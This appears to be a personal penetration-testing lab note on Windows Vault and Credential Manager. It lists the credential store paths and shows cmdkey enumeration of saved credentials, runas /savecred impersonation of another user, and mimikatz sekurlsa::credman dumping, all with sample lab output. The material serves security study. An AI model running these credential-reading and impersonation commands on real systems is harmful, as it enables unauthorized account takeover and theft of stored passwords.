Flo Aberger | Cyber Notes Structured writeups for labs, CTFs, and security projects.

Credential Attacks

Windows Vault and Credential Manager

Notes and commands for Windows Vault and Credential Manager.

2026-01-02
Tags passwordswindows-vault-and-credential-manager
Back to Pentest Notes Search Notes
1

•%UserProfile%\AppData\Local\Microsoft\Vault\

1

•%UserProfile%\AppData\Local\Microsoft\Credentials\

1

•%UserProfile%\AppData\Roaming\Microsoft\Vault\

1

•%ProgramData%\Microsoft\Vault\

1

•%SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

Credential Manager is the user-facing feature/API, while the actual encrypted stores are the vault/locker folders

It is possible to export Windows Vaults to .crd files either via Control Panel or with the following command. Backups created this way are encrypted with a password supplied by the user, and can be imported on other Windows systems

1

C:\Users\sadams>rundll32 keymgr.dll,KRShowKeyMgr

We can use cmdkey to enumerate the credentials stored in the current user’s profile

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

C:\Users\sadams>whoami
srv01\sadams

C:\Users\sadams>cmdkey /list

Currently stored credentials:

    Target: WindowsLive:target=virtualapp/didlogical
    Type: Generic
    User: 02hejubrtyqjrkfi
    Local machine persistence

    Target: Domain:interactive=SRV01\mcharles
    Type: Domain Password
    User: SRV01\mcharles

The first credential in the command output above,

1

virtualapp/didlogical

, is a generic credential used by Microsoft account/Windows Live services. The random looking username is an internal account ID. This entry may be ignored for our purposes.

The second credential,

1

Domain:interactive=SRV01\mcharles

###, is a domain credential associated with the user SRV01\mcharles. Interactive means that the credential is used for interactive logon sessions. Whenever we come across this type of credential, we can use runas to impersonate the stored user like so

1
2

C:\Users\sadams>runas /savecred /user:SRV01\mcharles cmd
Attempting to start cmd as user "SRV01\mcharles"...

Stored credentials are listed with the following format

Extracting Credentials

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

C:\Users\Administrator\Desktop> mimikatz.exe

.#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::credman

...SNIP...

Authentication Id: 0; 630472 (00000000:00099ec8)
Session: RemoteInteractive from 3
User Name: mcharles
Domain: SRV01
Logon Server: SRV01
Logon Time: 4/27/2025 2:40:32 AM
SID: S-1-5-21-1340203682-1669575078-4153855890-1002
        credman:
         [00000000]
         * Username: mcharles@inlanefreight.local
         * Domain: onedrive.live.com
         * Password:...SNIP...

Screenshot